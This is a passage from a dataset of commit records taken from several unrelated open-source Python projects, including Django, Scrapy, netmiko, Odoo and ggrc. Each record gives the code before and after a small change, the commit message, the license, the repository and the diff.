# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.fiware_oauth2 import views
# NOTE(garcianavalon) following
# https://github.com/ging/fi-ware-idm/wiki/Using-the-FI-LAB-instance
urlpatterns = patterns(
'fiware_oauth2.views',
url(r"^oauth2/authorize/$", views.AuthorizeView.as_view(),
name='fiware_oauth2_authorize'),
url(r"^oauth2/authorize/cancel/$", views.cancel_authorize,
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
url(r"^user$", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
Fix URL pattern for validating OAuth2 tokens
|
Fix URL pattern for validating OAuth2 tokens
|
Python
|
apache-2.0
|
ging/horizon,ging/horizon,ging/horizon,ging/horizon
|
---
+++
@@ -29,6 +29,6 @@
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
- url(r"^user", views.UserInfoView.as_view(),
+ url(r"^user$", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
8562a58501aaa3f53a6aef5a0c1fab60aafb7c61
|
scuole/states/models.py
|
scuole/states/models.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from localflavor.us.models import USStateField
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from scuole.core.models import PersonnelBase
from scuole.stats.models import SchoolYear, StatsBase
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class State(models.Model):
name = USStateField(_('State name'))
slug = models.SlugField()
shape = models.MultiPolygonField(_('State shape'), srid=4326, null=True)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class StateStats(StatsBase):
state = models.ForeignKey(State, related_name='stats')
year = models.ForeignKey(SchoolYear, related_name='state_stats')
class Meta:
unique_together = ('state', 'year',)
verbose_name_plural = _('State stats')
def __str__(self):
return '{0} {1}'.format(self.year.name, self.state.name)
@python_2_unicode_compatible
class Commissioner(PersonnelBase):
state = models.OneToOneField(State, related_name='commissioner_of')
def __str__(self):
return 'Texas Education Commissioner'
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from localflavor.us.models import USStateField
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from scuole.core.models import PersonnelBase
from scuole.stats.models import SchoolYear, StatsBase
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class State(models.Model):
name = USStateField(_('State name'))
slug = models.SlugField()
shape = models.MultiPolygonField(_('State shape'), srid=4326, null=True)
objects = models.GeoManager()
def __str__(self):
return self.name
def get_absolute_url(self):
from django.core.urlresolvers import reverse
return reverse('states:detail', kwargs={
'slug': self.slug,
})
@python_2_unicode_compatible
class StateStats(StatsBase):
state = models.ForeignKey(State, related_name='stats')
year = models.ForeignKey(SchoolYear, related_name='state_stats')
class Meta:
unique_together = ('state', 'year',)
verbose_name_plural = _('State stats')
def __str__(self):
return '{0} {1}'.format(self.year.name, self.state.name)
@python_2_unicode_compatible
class Commissioner(PersonnelBase):
state = models.OneToOneField(State, related_name='commissioner_of')
def __str__(self):
return 'Texas Education Commissioner'
|
Add get_absolute_url to State model
|
Add get_absolute_url to State model
|
Python
|
mit
|
texastribune/scuole,texastribune/scuole,texastribune/scuole,texastribune/scuole
|
---
+++
@@ -21,6 +21,12 @@
def __str__(self):
return self.name
+ def get_absolute_url(self):
+ from django.core.urlresolvers import reverse
+ return reverse('states:detail', kwargs={
+ 'slug': self.slug,
+ })
+
@python_2_unicode_compatible
class StateStats(StatsBase):
|
570a4911f0babf884fa57b4509957bd94fc790ed
|
moita/pipelines.py
|
moita/pipelines.py
|
# -*- coding: utf-8 -*-
import json
from collections import defaultdict
from datetime import datetime
from unidecode import unidecode
from .items import Subject
from .spiders.cagr import SEMESTER
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
def classes(item: Subject):
for klass in item['classes']:
yield [klass['id'], item['hours'], klass['vacancy'], klass['occupied'],
klass['special'], klass['remaining'], klass['lacking'],
klass['raw_timetable'], klass['teachers']]
del klass['raw_timetable']
class LegacyPipeline(object):
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
def open_spider(self, spider):
self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
self.data[item['campus']].append(subject)
return item
def close_spider(self, spider):
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
# -*- coding: utf-8 -*-
import json
from collections import defaultdict
from datetime import datetime
from unidecode import unidecode
from .items import Subject
from .spiders.cagr import SEMESTER
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
def classes(item: Subject):
for klass in item['classes']:
yield [klass['id'], item['hours'], klass['vacancy'], klass['occupied'],
klass['special'], klass['remaining'], klass['lacking'],
klass['raw_timetable'], klass['teachers']]
del klass['raw_timetable']
class LegacyPipeline(object):
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
self.data[item['campus']].append(subject)
return item
def close_spider(self, spider):
self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
Add date at the end
|
Add date at the end
|
Python
|
mit
|
ranisalt/moita-ufsc-crawler
|
---
+++
@@ -25,9 +25,6 @@
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
- def open_spider(self, spider):
- self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
-
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
@@ -35,5 +32,6 @@
return item
def close_spider(self, spider):
+ self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
85be415a27d23951f5ee943710ea3d22571aa697
|
mollie/api/objects/list.py
|
mollie/api/objects/list.py
|
from .base import Base
class List(Base):
current = None
def __init__(self, result, object_type):
Base.__init__(self, result)
self.object_type = object_type
def get_object_name(self):
return self.object_type.__name__.lower() + 's'
def __iter__(self):
"""Implement iterator logic."""
self.current = None
return self
def __next__(self):
"""Implement iterator logic."""
if self.current is None:
self.current = 0
else:
self.current += 1
try:
item = self['_embedded'][self.get_object_name()][self.current]
return self.object_type(item)
except IndexError:
raise StopIteration
@property
def count(self):
if 'count' not in self:
return None
return int(self['count'])
def get_offset(self):
if 'offset' not in self:
return None
return self['offset']
|
from .base import Base
class List(Base):
current = None
def __init__(self, result, object_type):
Base.__init__(self, result)
self.object_type = object_type
def get_object_name(self):
return self.object_type.__name__.lower() + 's'
def __iter__(self):
"""Implement iterator logic."""
self.current = None
return self
def __next__(self):
"""Implement iterator logic."""
if self.current is None:
self.current = 0
else:
self.current += 1
try:
item = self['_embedded'][self.get_object_name()][self.current]
return self.object_type(item)
except IndexError:
raise StopIteration
next = __next__ # support python2 iterator interface
@property
def count(self):
if 'count' not in self:
return None
return int(self['count'])
def get_offset(self):
if 'offset' not in self:
return None
return self['offset']
|
Add proxy method for python2 iterator support
|
Add proxy method for python2 iterator support
|
Python
|
bsd-2-clause
|
mollie/mollie-api-python
|
---
+++
@@ -28,6 +28,8 @@
except IndexError:
raise StopIteration
+ next = __next__ # support python2 iterator interface
+
@property
def count(self):
if 'count' not in self:
|
1994a59d3ae9d3f24445f11f3bc0dd3089042bc4
|
main.py
|
main.py
|
from order import Order
from orderbook import OrderBook
from client import FinanceClient
from ordermanager import OrderManager
from strategy import Vanilla, Strawberry
import sys
# local server for finance data
host_ip, server_port = "localhost", 9995
def main():
"""
Turn on the FinanceServer
- fetch data from the FinanceServer
- parse out each order as an Order object
- add these Orders to the OrderBook using the values in Action
- for each added order, decide to trade indicated by signal
"""
strategy_choice = sys.argv[1]
books = {}
client = FinanceClient(host_ip, server_port)
ordermanager = OrderManager()
if strategy_choice == 'Vanilla':
strategy = Vanilla()
elif strategy_choice == 'Strawberry':
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
print(strategy.name, strategy.description)
for line in client.fetch():
try:
order = Order(line)
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
book.add(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
from order import Order
from orderbook import OrderBook
from client import FinanceClient
from ordermanager import OrderManager
from strategy import Vanilla, Strawberry
import sys
# local server for finance data
host_ip, server_port = "localhost", 9995
def main():
"""
Turn on the FinanceServer
- fetch data from the FinanceServer
- parse out each order as an Order object
- add these Orders to the OrderBook using the values in Action
- for each added order, decide to trade indicated by signal
"""
strategy_choice = sys.argv[1]
books = {}
client = FinanceClient(host_ip, server_port)
ordermanager = OrderManager()
if strategy_choice == 'Vanilla':
strategy = Vanilla()
elif strategy_choice == 'Strawberry':
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
print(strategy.name, strategy.description)
for line in client.fetch():
try:
order = Order(line)
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
if order.action == 'A':
book.add(order)
elif order.side == 'M':
book.modify(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
Use modify with the orderbook
|
Use modify with the orderbook
|
Python
|
mit
|
albhu/finance
|
---
+++
@@ -27,7 +27,7 @@
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
-
+
print(strategy.name, strategy.description)
for line in client.fetch():
@@ -36,7 +36,10 @@
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
- book.add(order)
+ if order.action == 'A':
+ book.add(order)
+ elif order.side == 'M':
+ book.modify(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
|
67ea74ac57712ba963530845b566c62d7c5307dc
|
recaptcha_comments/forms.py
|
recaptcha_comments/forms.py
|
from django.contrib.comments.forms import CommentForm
from recaptcha_comments.fields import RecaptchaField
class RecaptchaCommentForm(CommentForm):
captcha = RecaptchaField()
def clean_captcha(self):
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
|
from django.contrib.comments.forms import CommentForm
from recaptcha_comments.fields import RecaptchaField
class RecaptchaCommentForm(CommentForm):
captcha = RecaptchaField()
def clean_captcha(self):
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
return self.cleaned_data['captcha']
|
Fix a flow issue (long standing bug)
|
Fix a flow issue (long standing bug)
|
Python
|
mit
|
theju/django-comments-apps
|
---
+++
@@ -8,3 +8,4 @@
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
+ return self.cleaned_data['captcha']
|
01a012bf37c438c845e4962ffa6f1c0e1e2723f4
|
netmiko/cisco/cisco_ios.py
|
netmiko/cisco/cisco_ios.py
|
from __future__ import unicode_literals
from netmiko.cisco_base_connection import CiscoSSHConnection
from netmiko.cisco_base_connection import CiscoTelnetConnection
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
class CiscoIosTelnet(CiscoTelnetConnection):
"""Cisco IOS Telnet driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
|
from __future__ import unicode_literals
from netmiko.cisco_base_connection import CiscoSSHConnection
from netmiko.cisco_base_connection import CiscoTelnetConnection
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
@staticmethod
def autodetect(session):
"""
"""
matches = ["Cisco IOS Software", "Cisco Internetwork Operating System Software"]
try:
response = session.send_command("show version | inc Cisco")
for m in matches:
if m in response:
return 99
except:
return 0
return 0
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
class CiscoIosTelnet(CiscoTelnetConnection):
"""Cisco IOS Telnet driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
|
Add autodetect for Cisco IOS
|
Add autodetect for Cisco IOS
|
Python
|
mit
|
fooelisa/netmiko,ktbyers/netmiko,ktbyers/netmiko,isidroamv/netmiko,isidroamv/netmiko,fooelisa/netmiko
|
---
+++
@@ -6,6 +6,21 @@
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
+
+ @staticmethod
+ def autodetect(session):
+ """
+ """
+ matches = ["Cisco IOS Software", "Cisco Internetwork Operating System Software"]
+ try:
+ response = session.send_command("show version | inc Cisco")
+ for m in matches:
+ if m in response:
+ return 99
+ except:
+ return 0
+ return 0
+
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
|
424f6c8c1c4b65e04196a568cfe56b77265aa063
|
kobo/apps/external_integrations/models.py
|
kobo/apps/external_integrations/models.py
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _
def _set_cors_field_options(name, bases, attrs):
cls = type(name, bases, attrs)
# The `cors` field is already defined by `AbstractCorsModel`, but let's
# help folks out by giving it a more descriptive name and help text, which
# will both appear in the admin interface
cors_field = cls._meta.get_field('cors')
cors_field.verbose_name = _('allowed origin')
cors_field.help_text = _('You must include scheme (http:// or https://)')
return cls
class CorsModel(models.Model, metaclass=_set_cors_field_options):
"""
A model with one field, `cors`, which specifies an allowed origin that must
exactly match the host with its scheme. e.g. https://example.com
"""
cors = models.CharField(max_length=255)
def __str__(self):
return self.cors
class Meta:
verbose_name = _('allowed CORS origin')
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _
class CorsModel(models.Model):
"""
A model with one field, `cors`, which specifies an allowed origin that must
exactly match `request.META.get('HTTP_ORIGIN')`
"""
cors = models.CharField(
max_length=255,
verbose_name=_('allowed origin'),
help_text=_(
'Must contain exactly the URI scheme, host, and port, e.g. '
'https://example.com:1234. Standard ports (80 for http and 443 '
'for https) may be omitted.'
)
)
def __str__(self):
return self.cors
class Meta:
verbose_name = _('allowed CORS origin')
|
Simplify CORS model and improve wording
|
Simplify CORS model and improve wording
|
Python
|
agpl-3.0
|
kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi
|
---
+++
@@ -3,24 +3,21 @@
from django.utils.translation import ugettext_lazy as _
-def _set_cors_field_options(name, bases, attrs):
- cls = type(name, bases, attrs)
- # The `cors` field is already defined by `AbstractCorsModel`, but let's
- # help folks out by giving it a more descriptive name and help text, which
- # will both appear in the admin interface
- cors_field = cls._meta.get_field('cors')
- cors_field.verbose_name = _('allowed origin')
- cors_field.help_text = _('You must include scheme (http:// or https://)')
- return cls
-
-
-class CorsModel(models.Model, metaclass=_set_cors_field_options):
+class CorsModel(models.Model):
"""
A model with one field, `cors`, which specifies an allowed origin that must
- exactly match the host with its scheme. e.g. https://example.com
+ exactly match `request.META.get('HTTP_ORIGIN')`
"""
- cors = models.CharField(max_length=255)
+ cors = models.CharField(
+ max_length=255,
+ verbose_name=_('allowed origin'),
+ help_text=_(
+ 'Must contain exactly the URI scheme, host, and port, e.g. '
+ 'https://example.com:1234. Standard ports (80 for http and 443 '
+ 'for https) may be omitted.'
+ )
+ )
def __str__(self):
return self.cors
|
d27ded9fb8c833b2f21fedade5cbef9ab831453e
|
src/ggrc/models/hooks/comment.py
|
src/ggrc/models/hooks/comment.py
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.model_posted_after_commit.connect_via(Comment)
def handle_comment_post(sender, obj=None, src=None, service=None):
"""Save information on which user created the Comment object
Args:
sender: the class of the object that initiated the server request
obj: the instance of `sender` that initiated the server request
src: a dictionary containing the POST data sent with request
service: the server-side API service that handled the request
Returns:
None
"""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.collection_posted.connect_via(Comment)
def handle_comment_post(sender, objects=None, **kwargs):
"""Save information on which user created the Comment object."""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
for obj in objects:
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
Fix creating revisions of ObjectOwner of Comment
|
Fix creating revisions of ObjectOwner of Comment
|
Python
|
apache-2.0
|
josthkko/ggrc-core,AleksNeStu/ggrc-core,andrei-karalionak/ggrc-core,kr41/ggrc-core,j0gurt/ggrc-core,kr41/ggrc-core,selahssea/ggrc-core,plamut/ggrc-core,j0gurt/ggrc-core,kr41/ggrc-core,plamut/ggrc-core,selahssea/ggrc-core,j0gurt/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core,j0gurt/ggrc-core,selahssea/ggrc-core,kr41/ggrc-core,VinnieJohns/ggrc-core,andrei-karalionak/ggrc-core,andrei-karalionak/ggrc-core,VinnieJohns/ggrc-core,plamut/ggrc-core,AleksNeStu/ggrc-core,andrei-karalionak/ggrc-core,josthkko/ggrc-core,selahssea/ggrc-core,plamut/ggrc-core,VinnieJohns/ggrc-core,VinnieJohns/ggrc-core
|
---
+++
@@ -11,28 +11,17 @@
def init_hook():
"""Initialize all hooks"""
+ # pylint: disable=unused-variable
- # pylint: disable=unused-variable
- @Resource.model_posted_after_commit.connect_via(Comment)
- def handle_comment_post(sender, obj=None, src=None, service=None):
- """Save information on which user created the Comment object
-
- Args:
- sender: the class of the object that initiated the server request
- obj: the instance of `sender` that initiated the server request
- src: a dictionary containing the POST data sent with request
- service: the server-side API service that handled the request
- Returns:
- None
- """
+ @Resource.collection_posted.connect_via(Comment)
+ def handle_comment_post(sender, objects=None, **kwargs):
+ """Save information on which user created the Comment object."""
# pylint: disable=unused-argument
-
creator_id = get_current_user_id()
-
- obj_owner = ObjectOwner(
- person_id=creator_id,
- ownable_id=obj.id,
- ownable_type=obj.type,
- )
-
- db.session.add(obj_owner)
+ for obj in objects:
+ obj_owner = ObjectOwner(
+ person_id=creator_id,
+ ownable_id=obj.id,
+ ownable_type=obj.type,
+ )
+ db.session.add(obj_owner)
|
c20482f8c9c20b4d934e16a583697e2f8f520553
|
yesimeanit/showoff/newsletter_subscriptions/forms.py
|
yesimeanit/showoff/newsletter_subscriptions/forms.py
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import NewsletterSubscription
class SubscribtionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
def clean_email(self):
email = self.cleaned_data.get('email')
if email and NewsletterSubscription.objects.active().filter(email=email).count():
raise forms.ValidationError(_('This e-mail address already has an active subscription.'))
return email
class UnsubscriptionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('email',)
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import NewsletterSubscription
class SubscribtionForm(forms.ModelForm):
salutation = forms.ChoiceField(choices=NewsletterSubscription.SALUTATION_CHOICES,
required=False, label=_('salutation'), widget=forms.RadioSelect)
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
def clean_email(self):
email = self.cleaned_data.get('email')
if email and NewsletterSubscription.objects.active().filter(email=email).count():
raise forms.ValidationError(_('This e-mail address already has an active subscription.'))
return email
class UnsubscriptionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('email',)
|
Customize salutation form field a bit
|
Customize salutation form field a bit
|
Python
|
bsd-3-clause
|
guetux/django-yesimeanit
|
---
+++
@@ -5,6 +5,9 @@
class SubscribtionForm(forms.ModelForm):
+ salutation = forms.ChoiceField(choices=NewsletterSubscription.SALUTATION_CHOICES,
+ required=False, label=_('salutation'), widget=forms.RadioSelect)
+
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
|
dcf0ee630a20b413d2212c3d3ae19ce4008a33fe
|
openacademy/model/openacademy_course.py
|
openacademy/model/openacademy_course.py
|
from openerp import models, fields
'''
This module create module of Courso
'''
class Course(models.Model):
'''
This class create module of Course
'''
_name = 'openacademy.course' # Model odoo name
name = fields.Char(string='Title', required=True) # Field reserved to identified name rec
description = fields.Text(string='Description')
responsible_id = fields.Many2one('res.users',
ondelete='set null', string="Responsible", index=True)
session_ids = fields.One2many(
'openacademy.session', 'course_id', string="Sessions")
_sql_constraints = [
('name_description_check',
'CHECK(name != description)',
"The title of the course should not be the description"),
('name_unique',
'UNIQUE(name)',
"The course title must be unique"),
]
|
from openerp import api, models, fields
'''
This module create module of Courso
'''
class Course(models.Model):
'''
This class create module of Course
'''
_name = 'openacademy.course' # Model odoo name
name = fields.Char(string='Title', required=True) # Field reserved to identified name rec
description = fields.Text(string='Description')
responsible_id = fields.Many2one('res.users',
ondelete='set null', string="Responsible", index=True)
session_ids = fields.One2many(
'openacademy.session', 'course_id', string="Sessions")
_sql_constraints = [
('name_description_check',
'CHECK(name != description)',
"The title of the course should not be the description"),
('name_unique',
'UNIQUE(name)',
"The course title must be unique"),
]
@api.one
def copy(self, default=None):
default = dict(default or {})
copied_count = self.search_count(
[('name', '=like', u"Copy of {}%".format(self.name))])
if not copied_count:
new_name = u"Copy of {}".format(self.name)
else:
new_name = u"Copy of {} ({})".format(self.name, copied_count)
default['name'] = new_name
return super(Course, self).copy(default)
|
Modify copy method into inherit
|
[REF] openacademy: Modify copy method into inherit
|
Python
|
apache-2.0
|
Hiregui92/openacademy-project
|
---
+++
@@ -1,4 +1,4 @@
-from openerp import models, fields
+from openerp import api, models, fields
'''
This module create module of Courso
@@ -28,3 +28,17 @@
'UNIQUE(name)',
"The course title must be unique"),
]
+
+ @api.one
+ def copy(self, default=None):
+ default = dict(default or {})
+
+ copied_count = self.search_count(
+ [('name', '=like', u"Copy of {}%".format(self.name))])
+ if not copied_count:
+ new_name = u"Copy of {}".format(self.name)
+ else:
+ new_name = u"Copy of {} ({})".format(self.name, copied_count)
+
+ default['name'] = new_name
+ return super(Course, self).copy(default)
|
9f97f232a23dab38736e487bd69377b977dff752
|
candidates/tests/test_feeds.py
|
candidates/tests/test_feeds.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_webtest import WebTest
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
person_id='9876',
popit_person_new_version='1234567890abcdef',
source='Just for tests...',
)
self.action2 = LoggedAction.objects.create(
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
person_id='1234',
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
def test_unicode(self):
response = self.app.get('/feeds/changes.xml')
self.assertTrue("Just for tests..." in response)
self.assertTrue("Something with unicode in it…" in response)
def tearDown(self):
self.action2.delete()
self.action1.delete()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_webtest import WebTest
from popolo.models import Person
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
self.person1 = Person.objects.create(
name='Test Person1'
)
self.person2 = Person.objects.create(
name='Test Person2'
)
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
person=self.person1,
popit_person_new_version='1234567890abcdef',
source='Just for tests...',
)
self.action2 = LoggedAction.objects.create(
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
person=self.person2,
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
def test_unicode(self):
response = self.app.get('/feeds/changes.xml')
self.assertTrue("Just for tests..." in response)
self.assertTrue("Something with unicode in it…" in response)
def tearDown(self):
self.action2.delete()
self.action1.delete()
self.person2.delete()
self.person1.delete()
|
Update feed tests to use a person object when creating LoggedAction
|
Update feed tests to use a person object when creating LoggedAction
Otherwise the notification signal attached to LoggedAction for the
alerts throws an error as it expects a Person to exist
|
Python
|
agpl-3.0
|
DemocracyClub/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,neavouli/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextmp-popit,neavouli/yournextrepresentative,neavouli/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,neavouli/yournextrepresentative
|
---
+++
@@ -4,17 +4,24 @@
from django_webtest import WebTest
+from popolo.models import Person
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
+ self.person1 = Person.objects.create(
+ name='Test Person1'
+ )
+ self.person2 = Person.objects.create(
+ name='Test Person2'
+ )
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
- person_id='9876',
+ person=self.person1,
popit_person_new_version='1234567890abcdef',
source='Just for tests...',
)
@@ -22,7 +29,7 @@
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
- person_id='1234',
+ person=self.person2,
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
@@ -35,3 +42,5 @@
def tearDown(self):
self.action2.delete()
self.action1.delete()
+ self.person2.delete()
+ self.person1.delete()
|
49997f92f8f62a1fc259c0285d386887a399ba0e
|
pycroft/helpers/utc.py
|
pycroft/helpers/utc.py
|
from typing import NewType
from datetime import datetime, time, timezone, date
TimeTz = NewType('TimeTz', time)
DateTimeTz = NewType('DateTimeTz', datetime)
DateTimeNoTz = NewType('DateTimeNoTz', datetime)
def time_min() -> TimeTz:
return time.min.replace(tzinfo=timezone.utc)
def time_max() -> TimeTz:
return time.max.replace(tzinfo=timezone.utc)
def datetime_min() -> DateTimeTz:
return datetime.min.replace(tzinfo=timezone.utc)
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
|
from typing import NewType, Optional
from datetime import datetime, time, timezone, date
TimeTz = NewType('TimeTz', time)
DateTimeTz = NewType('DateTimeTz', datetime)
DateTimeNoTz = NewType('DateTimeNoTz', datetime)
def time_min() -> TimeTz:
return time.min.replace(tzinfo=timezone.utc)
def time_max() -> TimeTz:
return time.max.replace(tzinfo=timezone.utc)
def datetime_min() -> DateTimeTz:
return datetime.min.replace(tzinfo=timezone.utc)
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
def with_min_time(d: date) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, time_min()))
def with_max_time(d: date) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, time_max()))
def safe_combine(d: date, t: TimeTz) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, t))
def ensure_tzinfo(t: time) -> TimeTz:
if t.tzinfo is not None:
return TimeTz(t)
return TimeTz(t.replace(tzinfo=timezone.utc))
def combine_ensure_tzinfo(d: date, t: time) -> DateTimeTz:
return safe_combine(d, ensure_tzinfo(t))
def combine_or_midnight(d: date, t: Optional[time]) -> DateTimeTz:
if t is not None:
return combine_ensure_tzinfo(d, t)
return with_min_time(d)
|
Introduce many strictly typed datetime helper functions
|
Introduce many strictly typed datetime helper functions
|
Python
|
apache-2.0
|
agdsn/pycroft,agdsn/pycroft,agdsn/pycroft,agdsn/pycroft,agdsn/pycroft
|
---
+++
@@ -1,4 +1,4 @@
-from typing import NewType
+from typing import NewType, Optional
from datetime import datetime, time, timezone, date
@@ -21,3 +21,31 @@
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
+
+
+def with_min_time(d: date) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, time_min()))
+
+
+def with_max_time(d: date) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, time_max()))
+
+
+def safe_combine(d: date, t: TimeTz) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, t))
+
+
+def ensure_tzinfo(t: time) -> TimeTz:
+ if t.tzinfo is not None:
+ return TimeTz(t)
